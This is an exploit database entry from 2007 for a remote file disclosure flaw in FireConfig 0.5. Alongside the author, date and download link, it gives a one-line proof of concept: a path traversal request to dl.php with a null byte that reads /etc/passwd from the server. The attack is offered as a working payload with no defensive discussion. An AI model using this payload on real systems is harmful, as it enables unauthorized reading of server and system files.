FireConfig 0.5 - 'dl.php' Remote File Disclosure

EDB-ID:

4580

Author:

GoLd_M

Type:

webapps

Platform:

PHP

Published:

2007-10-28

FireConfig v0.5 (dl.php file) Remote File Disclosure Vulnerability
http://heanet.dl.sourceforge.net/sourceforge/fireconfig/fireconfig_v0.5.tar.gz
POC :
  /dl.php?file=../../../../../../etc/passwd%00

# milw0rm.com [2007-10-28]